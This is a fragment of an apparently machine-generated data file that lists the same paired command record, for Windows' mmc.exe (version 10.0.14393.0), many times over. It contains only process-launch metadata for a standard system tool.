System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\"],[\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae Windows\\u00ae Operating System'})\",\"Cmd(name='mmc', params={'mmc', '10.0.14393.0', 'c:/windows/system32/mmc.exe', 'Microsoft\\u00ae 